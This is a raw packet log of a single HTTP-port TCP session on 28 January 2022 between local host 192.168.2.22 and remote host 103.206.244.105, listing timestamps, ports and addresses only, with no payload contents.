Jan 28, 2022 21:37:48.516480923 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516515970 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516546011 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516577005 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516609907 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516640902 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516675949 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516710997 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516714096 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.516746998 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.516802073 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516820908 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.516838074 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516869068 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516911030 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516936064 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.516937971 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516963959 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.516979933 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.516990900 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517019987 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517041922 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517072916 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.517075062 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517108917 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.517112017 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517144918 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517172098 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517203093 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517229080 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517235994 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.517256975 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517285109 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517309904 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517334938 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517363071 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517364979 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.517388105 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.517390013 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517395020 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.517416954 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517445087 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517462969 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.517471075 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517499924 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517525911 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517550945 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517569065 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.517570972 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517599106 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517607927 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.517627001 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517658949 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517678022 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517703056 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517730951 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517735958 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.517755032 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517772913 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.517827034 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.517918110 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.517932892 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.518357038 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.697266102 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.697324038 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.697355986 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.697396040 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.697438002 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.697479010 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.697520018 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.697520018 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.697561026 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.697571039 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.697602987 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.697642088 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.697714090 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.697783947 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.697825909 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.697892904 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.697895050 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.697932959 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698002100 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.698035002 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698075056 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698115110 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698133945 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.698157072 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698198080 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698240995 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698270082 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.698278904 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698321104 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698344946 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.698363066 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698401928 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698426008 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.698543072 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698582888 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698609114 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.698626041 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698667049 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698702097 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.698707104 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698765039 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698796034 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698816061 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.698827028 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698848009 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.698872089 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698911905 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698937893 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.698952913 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.698992968 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.699008942 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.699033976 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.699074984 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.699093103 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.699114084 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.699155092 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.699181080 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.699197054 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.699235916 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.699259043 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.699275017 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.699316025 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.699333906 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.699353933 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.699394941 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.699425936 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.699531078 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.877082109 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.877129078 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.877168894 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.877208948 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.877293110 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.878384113 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.878427029 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.878511906 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.878518105 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.878560066 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.878598928 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.878639936 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.878679991 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.878717899 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.878719091 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.878757954 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.878776073 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.878801107 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.878839970 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.878865004 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.878880024 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.878920078 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.878945112 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.878959894 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879002094 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879029989 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.879046917 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879086018 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879125118 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879137993 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.879164934 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879194975 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.879204988 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879244089 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879281998 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.879283905 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879326105 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879359007 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.879364967 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879405975 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879430056 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.879446983 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879486084 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879524946 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.879528046 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879568100 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879595995 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.879609108 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879651070 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879677057 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.879688978 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879730940 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879755974 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.879770994 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879810095 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879838943 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.879849911 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879889965 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879915953 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.879930019 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879971027 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.879996061 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.880023956 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.880078077 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.880105972 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.880119085 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.880157948 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.880184889 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.880198002 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.880238056 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.880269051 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:48.880278111 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:48.880337000 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.059041977 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.059072018 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.059180975 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.060233116 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060282946 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060318947 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060354948 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060389042 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060444117 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060480118 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060481071 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.060517073 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060550928 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060575008 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.060585976 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060620070 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060647011 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.060656071 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060692072 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060720921 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.060724974 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060761929 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060791969 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.060796976 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060832024 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060861111 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.060866117 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060899973 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060928106 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.060935974 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060971975 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.060998917 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.061006069 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061042070 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061070919 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.061079025 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061113119 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061141968 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.061147928 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061182022 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061208963 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.061216116 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061255932 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061281919 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.061290979 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061326981 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061355114 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.061362028 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061395884 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061428070 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.061430931 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061465025 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061495066 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.061501026 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061537981 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061566114 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.061570883 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061605930 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061635017 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.061640024 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061674118 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061700106 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.061708927 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061743975 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061773062 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.061778069 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061814070 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061866045 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061878920 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.061925888 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.061929941 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.061964989 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.062019110 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.062030077 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.062056065 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.062127113 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.238651991 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.238712072 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.238822937 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.241216898 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241259098 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241301060 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241355896 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241362095 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.241395950 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241430044 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.241436958 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241477013 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241509914 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.241517067 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241559982 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241597891 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241612911 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.241641045 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241679907 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.241681099 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241719007 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241749048 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.241759062 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241797924 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241828918 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.241838932 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241908073 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241925001 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.241950035 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.241987944 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242014885 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.242027998 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242069960 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242098093 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.242110014 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242151976 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242178917 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.242189884 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242229939 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242258072 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.242269993 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242310047 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242336988 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.242348909 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242389917 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242419004 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.242429972 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242470980 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242500067 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.242510080 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242549896 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242578030 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.242589951 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242630959 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242655993 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.242670059 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242708921 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242733955 CET	49170	80	192.168.2.22	103.206.244.105
Jan 28, 2022 21:37:49.242748976 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242789984 CET	80	49170	103.206.244.105	192.168.2.22
Jan 28, 2022 21:37:49.242816925 CET	49170	80	192.168.2.22	103.206.244.105
